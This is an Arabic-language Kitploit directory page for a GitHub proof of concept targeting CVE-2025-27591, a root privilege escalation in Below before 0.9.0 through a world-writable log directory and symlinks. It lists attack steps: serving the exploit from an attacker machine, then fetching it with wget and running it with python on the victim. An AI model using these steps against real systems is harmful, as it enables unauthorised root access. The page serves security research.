Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-27591-PoC — CVE-2025-27591 هي ثغرة تصعيد صلاحيات أثرت على خدمة Below قبل الإصدار 0.9.0 | Kitploit
أدوات/GitHubGitHub/bridgeralderson/cve-2025-27591-poc
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالتعلم والتعليم
GitHubbridgeralderson/cve-2025-27591-poc

CVE-2025-27591-PoC

CVE-2025-27591 هي ثغرة تصعيد صلاحيات أثرت على خدمة Below قبل الإصدار 0.9.0

عرض المستودع
3221منذ سنة واحدةتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-27591 إثبات المفهوم

CVE-2025-27591 هي ثغرة تصعيد صلاحيات أثرت على خدمة Below قبل الإصدار 0.9.0. نشأت المشكلة بسبب إنشاء مجلد قابل للكتابة عالميًا في /var/log/below. يمكن للمهاجم استغلال هذه الثغرة من خلال التلاعب بالروابط الرمزية داخل هذا المجلد وربما الحصول على صلاحيات الجذر، مما يجعلها مصدر قلق أمني كبير للمستخدمين المحليين غير المميزين.

تمت كتابة هذا الإثبات المفاهيمي لأغراض تعليمية وبحثية فقط.

في وقت الكتابة، لم يكن هناك إثبات مفاهيمي متاح للجمهور لهذه الثغرة في المجتمع. لذلك، قررت مشاركة هذا التنفيذ بمسؤولية لسد هذه الفجوة، والمساهمة في النظام البيئي للبحث الأمني، ورفع الوعي حول الطبيعة الحرجة لنظام الملفات غير الآمن.

سبب الثغرة

image

إثبات المفهوم

من جهاز المهاجم:

1-git clone https://github.com/BridgerAlderson/CVE-2025-27591-PoC.git

2-cd CVE-2025-27591-PoC

3-python3 -m http.server 80

من النظام الضعيف:

1- wget http:///exploit.py

2-python exploit.py

image

المراجع

https://www.facebook.com/security/advisories/cve-2025-27591 https://github.com/facebookincubator/below/commit/da9382e6e3e332fd2c3195e22f34977f83f0f1f3

تنزيل الأداة